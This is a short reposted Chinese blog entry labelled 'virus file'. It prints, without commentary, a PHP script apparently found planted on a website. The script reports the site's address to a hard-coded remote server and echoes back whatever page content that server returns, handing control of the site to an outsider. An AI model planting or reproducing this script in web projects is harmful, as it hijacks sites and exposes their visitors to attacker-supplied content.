病毒文件

Posted Abner3721

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了病毒文件相关的知识,希望对你有一定的参考价值。

<?php
set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
$Rermote_server = "http://107.151.66.90:777/"; 
$host_name = "http://".$_SERVER[‘SERVER_NAME‘].$_SERVER[‘PHP_SELF‘];
$Content_mb=getHTTPPage($Rermote_server."/index.php?host=".$host_name);

function getHTTPPage($url) {
    $opts = array(
      ‘http‘=>array(
        ‘method‘=>"GET",
        ‘header‘=>"User-Agent: aQ0O010O"
      )
    );
    $context = stream_context_create($opts);
    $html = @file_get_contents($url, false, $context);
    if (empty($html)) {
        exit("<p align=‘center‘><font color=‘red‘><b>Connection Error!</b></font></p>");
    }    
    return $html;
} 

echo $Content_mb;
?>

 

以上是关于病毒文件的主要内容,如果未能解决你的问题,请参考以下文章

POJ2778DNA Sequence(AC自动机)

PNAS:机器学习揭示人类基因组中新型内源性病毒

20155219付颖卓 Exp3 免杀原理与实践

HDU3247 Resource Archiver(AC自动机+BFS+DP)

批处理文件的病毒代码大全!

外显子捕获的操作步骤